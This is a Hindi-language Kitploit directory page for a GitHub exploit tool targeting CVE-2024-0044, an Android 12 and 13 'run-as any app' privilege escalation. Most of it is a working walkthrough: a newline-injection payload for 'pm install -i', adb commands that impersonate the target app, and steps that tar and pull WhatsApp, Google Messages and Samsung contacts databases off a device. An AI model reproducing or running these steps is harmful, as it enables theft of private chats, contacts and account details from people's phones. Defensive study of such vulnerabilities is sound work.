Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve_2024_0044 — CVE-2024-0044: एक "run-as any app" उच्च-गंभीरता कमजोरी जो Android संस्करण 12 और 13 को प्रभावित करती है | Kitploit
उपकरण/GitHubGitHub/hunter24x24/cve_2024_0044
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHubhunter24x24/cve_2024_0044

cve_2024_0044

CVE-2024-0044: एक "run-as any app" उच्च-गंभीरता कमजोरी जो Android संस्करण 12 और 13 को प्रभावित करती है

रिपॉजिटरी देखें
1222 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE 2024 0044

CVE-2024-0044, जो PackageInstallerService.java फ़ाइल के createSessionInternal फ़ंक्शन में पहचाना गया है, एक उच्च-गंभीरता वाली कमज़ोरी है जो Android संस्करण 12 और 13 को प्रभावित करती है। यह कमज़ोरी एक हमलावर को "run-as any app" हमला करने की अनुमति देती है, जिससे उपयोगकर्ता की सहभागिता के बिना स्थानीय विशेषाधिकार वृद्धि होती है। यह समस्या createSessionInternal फ़ंक्शन में अनुचित इनपुट सत्यापन के कारण उत्पन्न होती है। एक हमलावर सत्र निर्माण प्रक्रिया में हेरफेर करके इसका शोषण कर सकता है, संभावित रूप से संवेदनशील डेटा तक अनधिकृत पहुँच प्राप्त कर सकता है और प्रभावित डिवाइस पर अनधिकृत कार्य कर सकता है।

इस शोषण की खोज Meta security द्वारा की गई थी।

प्रूफ ऑफ कॉन्सेप्ट को Tiny hack द्वारा संक्षेपित और साझा किया गया था।

सुरक्षा पैच के बारे में विवरण Android security bulletin पर पाए जा सकते हैं।

पूर्वापेक्षाएँ

  1. अपने मोबाइल फोन में USB डिबगिंग सक्षम करें और इसे USB केबल या वायरलेस डिबगिंग का उपयोग करके अपनी मशीन से कनेक्ट करें।
  2. अपनी मशीन पर कोई भी APK डाउनलोड करें, आप F-DROID का उपयोग कर सकते हैं।

टूल का उपयोग कैसे करें

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P का उपयोग उस लक्ष्य पैकेज नाम को निर्दिष्ट करने के लिए किया जाता है जिसके रूप में आप चलाना चाहते हैं।

-A डिवाइस में पुश करने के लिए APK फ़ाइल पथ निर्दिष्ट करने के लिए।

शोषण

टूल चलाएँ: python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

इस तरह एक payload.txt फ़ाइल उत्पन्न होगी:

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

टूल कुछ भागों को स्वचालित करता है और अन्य भाग मैनुअल हैं। आप पेलोड उत्पन्न करने के बाद बाहर निकल सकते हैं और सभी कमांड मैन्युअल रूप से चला सकते हैं या निर्देशों के साथ जारी रख सकते हैं।

इसके बाद आपको adb shell का उपयोग करके अपने डिवाइस से कनेक्ट करना होगा, पेलोड पेस्ट करना होगा, और सुनिश्चित करना होगा कि अंतिम कमांड के बाद आपको Success संदेश वापस मिले।

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

इसके बाद हम निम्नलिखित कमांड का उपयोग करके व्हाट्सएप डेटा प्राप्त करते हैं:

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

एक अस्थायी निर्देशिका बनाएँ: mkdir /data/local/tmp/wa/

एक tar फ़ाइल के लिए प्लेसहोल्डर बनाएँ: touch /data/local/tmp/wa/wa.tar

व्यापक अनुमतियाँ सेट करें: chmod -R 0777 /data/local/tmp/wa/ ताकि कोई भी उपयोगकर्ता इस निर्देशिका के भीतर पढ़, लिख और निष्पादित कर सके।

उपयोगकर्ता संदर्भ बदलें: run-as victim ताकि "victim" उपयोगकर्ता के समान अनुमतियाँ प्राप्त हो सकें।

लक्ष्य एप्लिकेशन के डेटा को संग्रहित करें: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, व्हाट्सएप डेटा निर्देशिका का एक tarball बनाते हुए।

अंत में डेटा खींचें

adb pull /data/local/tmp/wa/wa.tar

आप 7z या किसी अन्य टूल का उपयोग करके डेटा निकाल सकते हैं।

आप इसे HTML में बदलने के लिए Whatsapp chat exporter का उपयोग कर सकते हैं।

यह आपको अपने डिवाइस पर रूट एक्सेस के बिना व्हाट्सएप डेटा प्राप्त करने की अनुमति देता है।

Google Messages खींचना

बस पैकेज नाम इस प्रकार बदलें:

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

उपरोक्त निर्देशों का पालन करें और wa.tar फ़ाइल खींचने के बाद इसे अनटार करें और sqlitebrowser या किसी अन्य टूल का उपयोग करके com.google.android.apps.messaging/databases/bugle_db में बातचीत खोलें।

संपर्क खींचना

Samsung डिवाइस के लिए परीक्षण किया गया। अन्य डिवाइसों के लिए संपर्क प्रदाता का पैकेज नाम जाँचें।

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

उपरोक्त निर्देशों का पालन करें और wa.tar फ़ाइल खींचने के बाद इसे अनटार करें और sqlitebrowser या किसी अन्य टूल का उपयोग करके com.samsung.android.providers.contacts/databases/contacts2.db में संपर्क खोलें। db फ़ाइल में संपर्क सूची के साथ सभी उपयोगकर्ता ईमेल खातों की जानकारी होती है।

टूल डाउनलोड करें